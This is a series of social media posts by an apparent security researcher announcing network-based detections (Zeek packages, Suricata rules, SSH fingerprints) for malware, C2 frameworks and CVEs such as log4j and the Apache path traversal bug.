Chinese #APTs are currently very active. Here is a technical analysis on a #Linux backdoor with kernel level #rootkit used one of them... intezer.com/blog/malware-a… 👏 Avigayil Mechtinger

Detecting Linux based C2 ‘RedXOR’ on the wire. I wanted this to be like a tutorial/example of how you can use Zeek’s state keeping functionality. corelight.blog/2021/04/20/det… #RedXor #DFIR #Zeek #C2 #RHEL

Fight back against the ICMP tunneling Pingback malware with Anthony Kasza, Ben Reardon, The Zeek Network Security Monitor and Corelight: corelight.blog/2021/05/07/pin…

Earth is acceptable :)

Yet more content from the Labs team Corelight. A Zeek package and Suricata rule for detection of CVE-2021-31166 - a wormable Windows HTTP Protocol Stack vulnerability. This detects the current publically available POC expoit. enjoy! github.com/corelight/CVE-… Anthony Kasza

A follow up from Corelight Labs team on the HTTP vuln #CVE-2021-31166. Some Insight into our Zeek and Suricata detections, plus the evolution of the threat with winRM being a vector on TCP port 5985. corelight.blog/2021/05/27/det… Aaron Soto Anthony Kasza Alex Kirk Paul Dokas

We are hiring !

That’s some good looking green there !

A Zeek package for detection of the recent Apache path traversal bug in 2.4.49 and 2.4.50 CVE-2021-41773 github.com/corelight/CVE-… . The notice includes a snipit of the POST content for handier-than-pcap triage - when the target is things like /bin/sh

TIL the patent on #SSH fingerprinting “HASSH” I submitted while Salesforce was granted after a few years in the USPO queue. Guess I'm now a legit inventor! hat tip to my co-inventors/pals Adel Ka John Althouse Jeff Atkinson #shouldersofgiants #DFIR #NDR #Zeek patents.google.com/patent/US11095…

You may not think CVE-2021-42292 can be detected at the network level, but our @Corelight_inc Labs team (big shout-out to Keith J. Jones, Ph.D. Alex Kirk @ynadji Ben Reardon) shows you how on the blog today: corelight.com/blog/detecting… #CyberSecurity #DFIR #ThreatHunting #OpenNDR

Some #log4j detection content from Corelight Labs team. Creates notices, PLUS a bonus log4j.log containing payload IP:port:uri that is used to watch for subsequent traffic to (read: pwned). corelight.com/blog/simplifyi… and the code github.com/corelight/cve-…

Detecting second stage/callback #log4j payloads. AKA when Java GETs Java, you’re going to want to know about it… The third installment of log4j open sourced content from the Corelight Labs Team. corelight.com/blog/detecting… #Log4Shell #DFIR #zeek

A few ideas on detecting the Manjusaka C2 framework on the wire: corelight.com/blog/detecting…

Detection of vulnerable servers and exploit attempts against #OpenSSL punycode vulnerability #CVE-2022-3602. github.com/corelight/CVE-… Corelight

One of my favourite moments at hacker summer camp was catching up with my old mate Adel Adel Ka and exchanging country gifts. Make sure you check out his talk at Defcon!

Detect the brand new "SSHAMBLE" scanner (just dropped by HD at Blackhat USA) with this fingerprint: hassh=c6c8b23b1c966dad1173df11c4e4f431 . More on this later! Corelight customers already have the hassh package available, we also open source it here: github.com/corelight/hassh.

I went on a fun hunt of the "GTPDoor" backdoor at Blackhat USA 2025 corelight.com/blog/black-hat…